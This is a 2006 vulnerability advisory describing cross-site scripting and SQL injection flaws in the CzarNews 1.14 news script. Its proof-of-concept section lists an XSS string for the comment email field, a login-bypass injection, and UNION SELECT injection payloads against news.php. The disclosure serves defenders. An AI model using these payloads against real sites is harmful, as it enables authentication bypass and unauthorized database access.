XSS and Multiple SQL Injection in CzarNews
Summary
- Vulnerability
- XSS and Multiple SQL Injection in CzarNews
- Discovered
- 2006.04.04
- Last Update
- 2006.04.14 Exploitation code published
- ID
- EV0118
- CVE
- CVE-2006-1640 CVE-2006-1641
- Risk Level
- medium
- Type
- Multiple Vulnerabilities
- Status
- Unpatched. Vendor notyfied.
- Vendor
- n/a
- Vulnerable Software
- CzarNews (http://www.czaries.net/scripts/)
- Version
- 1.14
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple Vulnerabilities found in CzarNews (http://www.czaries.net/scripts/) script.
1. Cross-Site Scripting.
Vulnerable Script: news.php
Parameter email is not properly sanitized. This can be used to post arbitrary HTML or web script code.
Condition: magic_quotes_gpc = off
2. Multiple SQL Injections.
Vulnerable scripts: </p><p>cn_auth.php</p><p>news.php</p>
Parameters usern(cn_auth.php), passw(cn_auth.php), s(news.php), a(dpost.php) are not properly sanitized before being used in SQL queries. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc = off
PoC/Exploit
1. Cross-Site Scripting Example:
URL: http://[host]/news.php?a=1
Post a Comment
Email: ">[XSS]<aaa aaa="
2. SQL Injection Examples:
URL: http://[host]/index.php
Username: ' or 1/*
Password: any
URL: http://[host]/news.php
News Search: zzzz%' union select 1,2,3,4,5,6,7,8,9,10/*
URL: http://[host]/news.php?a=999'%20union%20select%201,2,3,4,5,6,7,8,9,10/*
Solution.
Solution for "XSS and Multiple SQL Injection in CzarNews" is not available. Check vendor's website for updates.